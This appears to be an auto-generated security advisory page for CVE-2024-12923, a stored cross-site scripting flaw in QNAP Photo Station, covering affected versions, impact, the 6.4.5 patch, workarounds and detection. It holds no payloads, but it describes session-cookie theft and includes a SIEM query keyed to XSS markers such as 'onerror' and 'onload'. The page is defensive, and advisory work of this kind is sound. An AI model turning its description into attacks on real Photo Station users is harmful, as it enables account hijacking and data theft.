CVE-2024-12923 – A stored cross-site scripting (XSS) vulnerabili... (How to Fix)

Q: What is the severity of CVE-2024-12923?

CVE-2024-12923 has a CVSS score of 5.4 (MEDIUM). A stored cross-site scripting (XSS) vulnerability in QNAP Photo Station allows authenticated attackers to inject malicious scripts that execute in victims' browsers. This affects all Photo Station users with vulnerable versions, potentially compromising their sessions and data. Attackers need valid user credentials to exploit this vulnerability.

📋 TL;DR

A stored cross-site scripting (XSS) vulnerability in QNAP Photo Station allows authenticated attackers to inject malicious scripts that execute in victims' browsers. This affects all Photo Station users with vulnerable versions, potentially compromising their sessions and data. Attackers need valid user credentials to exploit this vulnerability.

💻 Affected Systems

Products:

QNAP Photo Station

Versions: All versions before 6.4.5

Operating Systems: QTS, QuTS hero

Default Config Vulnerable: ⚠️ Yes

Notes: Requires attacker to have a valid user account; Photo Station must be enabled and accessible.

📦 What is this software?

Photo Station by Qnap

View all CVEs affecting Photo Station →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal session cookies, perform actions as authenticated users, exfiltrate sensitive data, or deploy malware to users' systems through malicious scripts.

🟠

Likely Case

Attackers with user accounts could deface content, steal session tokens to hijack accounts, or redirect users to malicious sites.

🟢

If Mitigated

With proper input validation and output encoding, the vulnerability would be prevented, and with network segmentation, impact would be limited to the Photo Station application.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated access; specific injection vectors not disclosed in advisory.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Photo Station 6.4.5 (2025/01/02) and later

Vendor Advisory: https://www.qnap.com/en/security-advisory/qsa-25-24

Restart Required: Yes

Instructions:

1. Log into QNAP App Center. 2. Check for Photo Station updates. 3. Install version 6.4.5 or later. 4. Restart Photo Station service.

🔧 Temporary Workarounds

Disable Photo Station

all

Temporarily disable Photo Station if not needed

Log into QTS/QuTS > App Center > Photo Station > Disable

Restrict Network Access

all

Limit Photo Station access to trusted networks only

Configure firewall rules to restrict Photo Station port access

🧯 If You Can't Patch

Implement strict input validation and output encoding at web application layer
Use Content Security Policy (CSP) headers to mitigate XSS impact

🔍 How to Verify

Check if Vulnerable:

Check Photo Station version in QNAP App Center; versions below 6.4.5 are vulnerable.

Check Version:

Log into QTS/QuTS > App Center > Photo Station > check version

Verify Fix Applied:

Confirm Photo Station version is 6.4.5 or later in App Center and test XSS payloads in user input fields.

📡 Detection & Monitoring

Log Indicators:

Unusual script tags in Photo Station logs
Multiple failed login attempts followed by successful login

Network Indicators:

Unusual outbound connections from Photo Station server
Suspicious JavaScript payloads in HTTP requests

SIEM Query:

source="photo_station_logs" AND ("script" OR "javascript" OR "onerror" OR "onload")

📊 Metadata

CVE ID: CVE-2024-12923

CVSS v3 Score: 5.4 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

EPSS Score: 0.06% exploit probability (18.6th percentile)

Published: August 29, 2025

Last Updated: September 22, 2025

🔗 References

https://www.qnap.com/en/security-advisory/qsa-25-24 Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-12923, you might also want to check these: